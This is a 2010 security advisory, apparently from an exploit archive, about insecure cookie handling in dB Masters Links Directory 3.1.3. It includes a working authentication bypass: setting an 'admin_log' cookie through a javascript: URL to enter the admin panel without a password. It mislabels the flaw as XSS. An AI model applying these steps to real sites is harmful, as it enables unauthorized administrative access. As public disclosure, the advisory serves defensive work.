dB Masters Multimedia Insecure Cookie Handling Vulnerability

2010.01.07
Credit: indoushka
Risk: High
Local: No
Remote: Yes
CWE: CWE-287


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

======================================================================================== | # Title : dB Masters Multimedia Insecure Cookie Handling Vulnerability | | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : Powered by dB Masters Multimedia (dB Masters Links Directory 3.1.3) | | # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | | # Bug : XSS | ====================== Exploit By indoushka ================================= | # Exploit : | | 1- http://server/links/admin.php | 2- javascript:document.cookie="admin_log=in;path=/"; | login whith the pass "in" | 3- javascript:document.cookie="admin_log=indoushka;path=/"; | login whith out pss | tested in Opera V.10 | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | -------------------------------------------------------------------------------------------

References:

http://www.securityfocus.com/bid/37517
http://www.osvdb.org/61393
http://secunia.com/advisories/37985
http://packetstormsecurity.org/0912-exploits/dbmastersmm-insecure.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top